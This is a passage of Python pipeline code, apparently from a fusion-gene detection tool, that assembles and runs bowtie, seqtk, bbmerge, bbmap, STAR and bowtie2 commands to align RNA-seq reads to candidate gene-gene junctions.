job.link(outdir('reads-ids_clip_bowtie2_psl_r2r2.fq'), outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq'), temp_path=temp_flag) # map using bowtie ms = min(options.mismatches,2) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_bowtie2_psl_max_filtered.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_bowtie2_unique'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',outdir('gene-gene-bowtie_bowtie2_unique/'),kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_bowtie2_psl_r1r1-t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_bowtie2_psl_r2r2-t.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('split_gene-gene_bowtie2_filtered.sam'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq')),id = "##reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r1.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1_t.fq'),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_bowtie2_psl_r2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2_t.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2.fq'),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1.fq'), outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1_t.fq'), temp_path=temp_flag) job.link(outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2.fq'), outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2_t.fq'), temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_r1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_bowtie2_psl_r2.fq'),temp_path=temp_flag) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('reads-refs_clip_bowtie2_psl_uniq.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-bowtie_bowtie2.fa'),kind='output') job.run() job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',outdir('gene-gene-bowtie_bowtie2.fa'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-bowtie_bowtie2/'),kind='output',checksum='no') job.add('',outdir('gene-gene-bowtie_bowtie2/'),kind='output',command_line='no') job.run() # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_bowtie2'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if options.ff_tryhard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('',outdir('gene-gene-bowtie_bowtie2/'),kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_1_t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_bowtie2_psl_unmapped_filtered_2_t.fq'),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_bowtie2.sam'),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_bowtie2.sam'),kind='output') job.run() job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_bowtie2.sam'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_bowtie2_patch.sam'),kind='output') job.run() job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('split_gene-gene_bowtie2_patch.sam'),kind='input',temp_path=temp_flag) #job.add('--output',outdir('split_gene-gene_bowtie2_patch.psl'),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_bowtie2_patch.psl'),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_bowtie2_patch.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_bowtie2_final.psl'),kind='output') job.add('--remove-extra',kind='parameter') job.run() if job.iff(empty(outdir('split_gene-gene_bowtie2_final.psl')),id = "#split_gene-gene_bowtie2_final#"): job.link(outdir('gene-gene-bowtie2_final.psl'), outdir('gene-gene-bowtie2_final_more.psl'), temp_path=temp_flag) job.clean(outdir('split_gene-gene_bowtie2_final.psl'),temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('split_gene-gene_bowtie2_final.psl'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-bowtie2_final.psl'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-bowtie2_final_more.psl'),kind='output') job.run() # find the best unique alignments of reads job.add(_FC_+'psl_best_unique_contigs.py',kind='program') job.add('--input',outdir('gene-gene-bowtie2_final_more.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('gene-gene-bowtie2_best-unique.psl'),kind='output') # if (not empty(outdir('candidate_fusion-genes_further_mark.txt'))) and (not empty(datadir('custom_genes.txt'))): # job.add('--ties',datadir('custom_genes_mark.txt'),kind='output') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') job.add('--ties-overlappings',datadir('ensembl_overlapping_genes.txt'),kind='input') job.add('--anchor',length_anchor_bowtie2,kind='parameter') # find_fusion_genes_blat.py --threshold_overlap is enough! job.add('--mismatches',options.mismatches_psl,kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--tmp_dir',tmp_dir,kind='output',checksum='no') job.run() # more filtering -- remove the reads from the gene-gene junctions # which have the pair read mapping on a totally different gene than # those involved in the gene-gene junction if not options.all_reads_junction: job.add(_FC_+'remove_reads_exon_exon_psl.py',kind='program') job.add('--input_psl',outdir('gene-gene-bowtie2_best-unique.psl'),kind='input',temp_path=temp_flag) job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='input',temp_path=temp_flag) job.add('--output_psl',outdir('gene-gene-bowtie2_best-unique_gene_pairs.psl'),kind='output') job.run() else: job.link(outdir('gene-gene-bowtie2_best-unique.psl'), outdir('gene-gene-bowtie2_best-unique_gene_pairs.psl'), temp_path=temp_flag) job.add(_FC_+'find_fusion_genes_psl.py',kind='program') job.add('--input_mappings',outdir('gene-gene-bowtie2_best-unique_gene_pairs.psl'),kind='input',temp_path=temp_flag) job.add('--input_genegene_fasta',outdir('gene-gene.fa'),kind='input',temp_path=temp_flag) job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--input_genes_positions',datadir('genes.txt'),kind='input') job.add('--threshold_overlap',length_anchor_bowtie2,kind='parameter') job.add('--mismatches',options.mismatches_psl,kind='parameter') job.add('--output',outdir('candidates_fusion_genes_reads_bowtie2_7.txt'),kind='output') job.run() job.add(_FC_+'smoothing_fusions_psl.py',kind='program') job.add('--input',outdir('candidates_fusion_genes_reads_bowtie2_7.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('candidates_fusion_genes_reads_bowtie2.txt'),kind='output') job.add('--wiggle','3',kind='parameter') job.run() # summary the gene-gene mappings job.add(_FC_+'build_report_fusions_psl.py',kind='program') job.add('--suporting_unique_reads',spanning_reads_bowtie2,kind='parameter') job.add('--anchor2',length_anchor2,kind='parameter') job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input',temp_path=temp_flag if options.skip_spotlight else 'no') job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag if options.skip_spotlight else 'no') job.add('--input_fusion_psl',outdir('candidates_fusion_genes_reads_bowtie2.txt'),kind='input',temp_path=temp_flag) job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') if options.psl_visualization and not empty(datadir('genome.2bit')): job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input') job.add('--psl_alignment_type','web',kind='parameter') if _BT_: job.add('--blat-dir',_BT_,kind='parameter') if options.sam_visualization: job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input') job.add('--sam_alignment','20',kind='parameter') job.add('--threads',options.processes,kind='parameter') if _B2_: job.add('--bowtie2-dir',_B2_,kind='parameter') if options.assembly: job.add('--velvet',kind='parameter') if _VT_: job.add('--velvet-dir',_VT_,kind='parameter') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE2.txt'),kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE2.zip'),kind='output') job.run() ################################################################################## # Find fusion genes using SPOTLIGHT method used for now with IGH only??? ################################################################################## if not options.skip_spotlight: if job.iff(eporcrlf2igh and (not empty(outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'))),id = "####focus-candidate_fusion-genes_further_eporcrlf2igh###"): ### job.add('prep-1by1.py',kind='program') job.add('-i',outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'),kind='input') # outdir('candidate_fusion-genes_further.txt') job.add('-r',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input') job.add('-1',outdir('candidate_focus_genes.txt'),kind='output') job.add('-2',outdir('candidate_focus_reads.txt'),kind='output') job.run() job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('candidate_focus_reads.txt'),kind='input') job.add('',outdir('candidate_focus_all_reads.txt'),kind='output') job.run() if job.iff(not empty(outdir('original_important.fq.gz')),id="##focus-original_important##"): job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag) job.add('',outdir('candidate_focus_all_reads.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('focus.fq'),kind='output') job.run() elif job.iff(not empty(outdir('originala.fq.gz')),id="##focus-originala##"): job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input',temp_path=temp_flag) job.add('',outdir('candidate_focus_all_reads.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('focus.fq'),kind='output') job.run() else: t = ["ERROR: '%s' and '%s' not found!" % (outdir('original_important.fq.gz'),outdir('originala.fq.gz'))] job.write(t, stderr=True) sys.exit(1) fgenes = [] if not empty(outdir('candidate_focus_genes.txt')): fgenes = [el.rstrip() for el in file(outdir('candidate_focus_genes.txt'),'r') if el.rstrip()] freads = [] if not empty(outdir('candidate_focus_reads.txt')): freads = [el.rstrip() for el in file(outdir('candidate_focus_reads.txt'),'r') if el.rstrip()] for i in range(len(fgenes)): job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('focus.fq'),kind='input') job.add('',freads[i],kind='input',temp_path=temp_flag) job.add('>',freads[i]+'.fq',kind='output') job.run() ## DEBUG #temp_flag = 'no' if options.skip_bbmerge: job.add(_FC_+'merge-reads.py',kind='program') job.add('-1',freads[i]+'.fq',kind='input',temp_path=temp_flag) job.add('-m',freads[i]+'_m.fq',kind='output') job.add('--overlap','11',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.run() elif options.skip_bbmerge_auto: job.add(_BP_+'bbmerge.sh',kind='program') job.add('in=',freads[i]+'.fq',kind='input',space='no',temp_path=temp_flag) job.add('out=',freads[i]+'_m.fq',kind='output',space='no') job.add('threads=',options.processes,kind='parameter',space='no') job.add('strict=','f',kind='parameter',space='no') job.add('minoverlap=','11',kind='parameter',space='no') job.add('-Xmx',options.xmx,kind='parameter',checksum='no',space='no') job.run() else: job.add(_BP_+'bbmerge-auto.sh',kind='program') job.add('in=',freads[i]+'.fq',kind='input',space='no',temp_path=temp_flag) job.add('out=',freads[i]+'_m.fq',kind='output',space='no') job.add('threads=',options.processes,kind='parameter',space='no') job.add('extend2=','20',kind='parameter',space='no') job.add('iterations=','3',kind='parameter',space='no') job.add('k=','17',kind='parameter',space='no') job.add('mindepthseed=','1',kind='parameter',space='no') job.add('mindepthextend=','1',kind='parameter',space='no') job.add('minoverlap=','11',kind='parameter',space='no') job.add('-Xmx',options.xmx,kind='parameter',checksum='no',space='no') job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',min_len_reads*2-4,kind='parameter') job.add('',freads[i]+'_m.fq',kind='input',temp_path=temp_flag) job.add('>',freads[i]+'_merg.fq',kind='output') job.run() # deduplicate job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',freads[i]+'_merg.fq',kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('paste','- - - -',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','2,2',kind='parameter') job.add('-u',kind='parameter') # unique job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('>',freads[i]+'_merged.fq',kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',freads[i]+'_merged.fq',kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',freads[i]+'_merged_count.txt',kind='output') job.run() mc = -1 uf = freads[i]+'_merged_count.txt' if os.path.exists(uf): mc = int(float(file(uf,"r").readline().strip())) job.clean(uf,temp_path=temp_flag) fqm = freads[i]+'_merged.fq' if job.iff((not empty(fqm)) and (mc >= spanning_reads_spotlight), id = "#freads_"+str(i)+"_merged.fq#"): ##################################################################### # VELVET stuff ##################################################################### # job.add(_SK_+'seqtk',kind='program') # job.add('seq','-A',kind='parameter') # job.add('',freads[i]+'_merged.fq',kind='input') # job.add('>',freads[i]+'_merged.fa',kind='output') # job.run() # vel = fgenes[i]+"_velvet/" # job.add(_VT_+'velveth',kind='program') # job.add('',vel,kind='output') # job.add('','23',kind='parameter') # kmer # job.add('-short',kind='parameter') # job.add('',freads[i]+'_merged.fa',kind='output') # job.run() # job.add(_VT_+'velvetg',kind='program') # job.add('',vel,kind='output') # job.add('-cov_cutoff','2',kind='parameter') # job.add('-read_trkg','yes',kind='parameter') # job.run() # job.add(_OS_+'oases',kind='program') # job.add('',vel,kind='output') # job.add('-min_trans_lgth','100',kind='parameter') # job.add('-cov_cutoff','2',kind='parameter') # 2 reads minimum coverage # job.run() ##################################################################### job.add(_FC_+'generate_gene-gene_junctions.py',kind='program') job.add('--input',fgenes[i],kind='input',temp_path=temp_flag) job.add('--input_database',datadir('genes.fa'),kind='input') job.add('--input_exons',datadir('exons.txt'),kind='input') job.add('--reverse',kind='parameter') job.add('--longest',outdir('genegene_longest.txt.'+str(i)),kind='output') job.add('--output',outdir('genegene.fa.'+str(i)),kind='output') job.run() ## DEBUG #temp_flag = 'no' use_bbmap = True use_star = False use_bowtie2 = False use_libssw = False use_bwa = False if use_bwa: bd = outdir("focus_bwa.%d/" % (i,)) job.add(_BA_+'bwa',kind='program') job.add('index',kind='parameter') job.add('-p',bd,kind='output') job.add('-p',bd+'.amb',kind='output',command_line='no') job.add('',outdir('genegene.fa.'+str(i)),kind='input') job.run() job.add(_BA_+'bwa',kind='program') job.add('mem',kind='parameter') job.add('-O','2',kind='parameter') # original 6 job.add('-A','2',kind='parameter') # original 2 job.add('-E','1',kind='parameter') # original 1 job.add('-L','100',kind='parameter') # original 5 # job.add('-a',kind='parameter') # job.add('-T','1',kind='parameter') job.add('-t',options.processes,kind='parameter',checksum='no') job.add('',bd,kind='input') job.add('',bd+'.amb',kind='input',command_line='no',temp_path=temp_flag) job.add('',bd+'.ann',kind='input',command_line='no',temp_path=temp_flag) job.add('',bd+'.bwt',kind='input',command_line='no',temp_path=temp_flag) job.add('',bd+'.pac',kind='input',command_line='no',temp_path=temp_flag) job.add('',bd+'.sa',kind='input',command_line='no',temp_path=temp_flag) job.add('',fqm,kind='input') job.add('>',outdir('focus-bwa.sam.'+str(i)),kind='output') #job.add('2>',outdir('log_bwa_reads-gene-gene.stdout.txt.')+str(i),kind='output',checksum='no') job.run() job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag) job.link(outdir('focus-bwa.sam.'+str(i)),outdir('focus.sam.'+str(i)),temp_path=temp_flag) sys.exit(1) if use_libssw: ########## # LIBSSW ######### _LS_ = '' # align the unmapped reads using BOWTIE2 on candidate fusion gene-gene job.add(_LS_+'ssw_test',kind='program') job.add('-c',kind='parameter') job.add('-r',kind='parameter') job.add('-s',kind='parameter') job.add('',outdir('genegene.fa.'+str(i)),kind='input') job.add('',fqm,kind='input') job.add('>',outdir('focus-libssw.sam.'+str(i)),kind='output') job.run() job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag) job.link(outdir('focus-libssw.sam.'+str(i)),outdir('focus.sam.'+str(i)),temp_path=temp_flag) if use_bbmap: ########## # BBMAP ######### bd = outdir("focus_bbmap.%d/" % (i,)) # build the BBMAP index job.add(_BP_+'bbmap.sh',kind='program') job.add('ref=',outdir('genegene.fa.'+str(i)),kind='input',space='no',temp_path=temp_flag) job.add('path=',bd,kind='output',space='no') job.add('samplerate=','1',kind='parameter',space='no') job.add('threads=',options.processes,kind='parameter',space='no',checksum='no') #job.add('k=','11',kind='parameter',space='no') # default is 13 # if this is specified somehow the mappgoes wrong job.add('-Xmx24g',kind='parameter',checksum='no') job.run() # align the unmapped reads using BBMAP on candidate fusion gene-gene job.add(_BP_+'bbmap.sh',kind='program') job.add('path=',bd,kind='input',space='no',temp_path=temp_flag) job.add('sam=','1.3',kind='parameter',space='no') job.add('slow=','t',kind='parameter',space='no') job.add('threads=',options.processes,kind='parameter',space='no',checksum='no') job.add('ignorebadquality=','f',kind='parameter',space='no') #job.add('notags=','t',kind='parameter',space='no') job.add('intronlen=','2',kind='parameter',space='no') job.add('maxindel=',outdir('genegene_longest.txt.'+str(i)),kind='parameter',space='no',from_file = 'yes') job.add('in=',fqm,kind='input',space='no',temp_path=temp_flag) # job.add('in=',vel+'transcripts.fa',kind='input',space='no') # this is for oases #job.add('in=',vel+'contigs.fa',kind='input',space='no') # this is for velvet job.add('out=',outdir('focus-bbmap.sam.'+str(i)),kind='output',space='no') job.add('-Xmx',options.xmx,kind='parameter',checksum='no',space='no') job.run() job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag) job.link(outdir('focus-bbmap.sam.'+str(i)),outdir('focus.sam.'+str(i)),temp_path=temp_flag) if use_star: ########## # STAR ######### # STAR is removing the /1 and /2 from the end of the reads names # changing "/1" and "/2" into "-1" "-2" such that STAR does not remove them job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("""'s/\/\([1-2]$\)/\-\\1/;n;n;n'""",fqm,kind='input',temp_path=temp_flag) job.add('>',fqm+'.fix',kind='output') job.run() # get the length of the FASTA file # job.add('du',kind='program') # job.add('-b',outdir('genegene.fa.'+str(i)),kind='input') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',outdir('genegene.fa.len.'+str(i)),kind='output') # job.run() job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',outdir('genegene.fa.'+str(i)),kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',outdir('genegene.fa.len.'+str(i)),kind='output') job.run() f_sequences_gg = 2 f_nucleotides_gg = 100 if os.path.exists(outdir('genegene.fa.len.'+str(i))): f_nucleotides_gg = int(float(file(outdir('genegene.fa.len.'+str(i)),'r').readline().strip())) f_genomesaindexnbases = int(min(14, math.log(f_nucleotides_gg,2)/(float(2)) - 1)) f_genomechrbinnbits = int(min(18, math.log(float(f_nucleotides_gg)/float(f_sequences_gg),2))) job.clean(outdir('genegene.fa.len.'+str(i)),temp_path=temp_flag) perct = 0.60 # 0.49 bd = outdir("focus_star.%d/" % (i,)) bdr = outdir("focus_star_results.%d/" % (i,)) job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',f_genomechrbinnbits,kind='parameter') job.add('--genomeSAindexNbases',f_genomesaindexnbases,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--genomeDir',bd,kind='output') job.add('--genomeFastaFiles',outdir('genegene.fa.'+str(i)),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',bd,kind='output') job.run() z = outdir('genegene_longest.txt.'+str(i)) # t = "[from file: '%s']" % (z,) # #if job.run(): # if os.path.exists(z): # t = file(z,'r').readline().strip() # align the unmapped reads using STAR on candidate fusion gene-gene job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') job.add('--twopass1readsN','-1',kind='parameter') job.add('--twopassMode','Basic',kind='parameter') job.add('--genomeSAindexNbases',f_genomesaindexnbases,kind='parameter') job.add('--sjdbOverhang',min_len_reads*2-4,kind='parameter') job.add('--alignIntronMin','5',kind='parameter') #??? job.add('--alignIntronMax',outdir('genegene_longest.txt.'+str(i)),kind='parameter',from_file = 'yes') job.add('--outFilterMatchNmin',min_len_reads*2-4,kind='parameter') job.add('--outFilterMatchNminOverLread',perct,kind='parameter') job.add('--outFilterScoreMinOverLread',perct,kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate',perct,kind='parameter') # NEW in v0.99.4b job.add('--genomeDir',bd,kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--seedSearchStartLmax',"12",kind='parameter') # 20 # default is: 50 job.add('--alignSJoverhangMin',"12",kind='parameter') # 9 # default is 5? # NEW in v0.99.4b job.add('--alignSJstitchMismatchNmax','30 -1 30 30',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.x job.add('--outSJfilterOverhangMin','10 10 10 10',kind='parameter')# default is: 30 12 12 12 ("non-canonical motifs","GT/AG"motif,"GC/AG"motif,"AT/AC"motif) job.add('--outSJfilterCountUniqueMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterCountTotalMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterDistToOtherSJmin','0 0 0 0',kind='parameter')# default is: 10 0 5 10 job.add('--outSJfilterIntronMaxVsReadN',z,kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',z,kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',z,kind='parameter',from_file='yes')# default is: 50000 100000 200000 #job.add('--outSJfilterIntronMaxVsReadN','%s %s %s' % (t,t,t),kind='parameter')# default is: 50000 100000 200000 job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--outSAMmultNmax','1',kind='parameter') # only one alignment per read job.add('--scoreGapNoncan','-4',kind='parameter') # should it be -2? job.add('--scoreGapATAC','-4',kind='parameter') # job.add('--scoreGap','0',kind='parameter') # job.add('--scoreDelOpen','0',kind='parameter') # job.add('--scoreDelBase','0',kind='parameter') # job.add('--scoreInsOpen','0',kind='parameter') # job.add('--scoreInsBase','0',kind='parameter') job.add('--readFilesIn',fqm+'.fix',kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',bdr,kind='output') job.add('--outFileNamePrefix',os.path.join(bdr,'Aligned.out.sam'),kind='output',command_line = 'no') job.run() job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("""'s/\-\([1-2]\\t\)/\/\\1/'""",os.path.join(bdr,'Aligned.out.sam'),kind='input',temp_path=temp_flag) job.add(">",os.path.join(bdr,'Aligned.out.fix.sam'),kind='output') job.run() job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag) job.link(os.path.join(bdr,'Aligned.out.fix.sam'),outdir('focus.sam.'+str(i)),temp_path=temp_flag) job.clean(bdr,temp_path=temp_flag) if use_bowtie2: ########## # BOWTIE2 ######### bd = outdir("focus_bowtie2.%d/" % (i,)) bdi = outdir("focus_bowtie2.%d/index" % (i,)) # build the BOWTIE2 index job.add(_B2_+'bowtie2-build',kind='program') job.add('-f',kind='parameter') job.add('--threads',options.processes,kind='parameter') job.add('--quiet',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','7',kind='parameter') job.add('',outdir('genegene.fa.'+str(i)),kind='input') job.add('',bdi,kind='output',checksum='no') job.add('',bd,kind='output',command_line='no') job.run() # align the unmapped reads using BOWTIE2 on candidate fusion gene-gene job.add(_B2_+'bowtie2',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33',kind='parameter') job.add('--no-unal',kind='parameter') job.add('--end-to-end',kind='parameter') job.add('-N','0',kind='parameter') # new job.add('-R','3',kind='parameter') # new job.add('-D','20',kind='parameter') # new job.add('-L','20',kind='parameter') job.add('-i','S,1,0.50',kind='parameter') job.add('-k','5',kind='parameter') job.add('-x',bdi,kind='input',checksum='no') job.add('-x',bd,kind='input',command_line='no',temp_path=temp_flag) job.add('-U',fqm,kind='input') job.add('-S',outdir('focus-bowtie2.sam.'+str(i)),kind='output') job.add('2>',outdir('log_focus_bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() # -D 20 -R 3 -N 1 -L 20 => almost like bwa-mem # tried -D 20 -R 3 -N 0 - L 20 -i 'S,1,0.5' but it was slow job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag) job.link(outdir('focus-bowtie2.sam.'+str(i)),outdir('focus.sam.'+str(i)),temp_path=temp_flag) job.add('sam2psl.py',kind='program') job.add('--input',outdir('focus.sam.'+str(i)),kind='input',temp_path=temp_flag) job.add('--read-seq',kind='parameter') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') # job.add('-k','12,12n',kind='parameter') # job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: 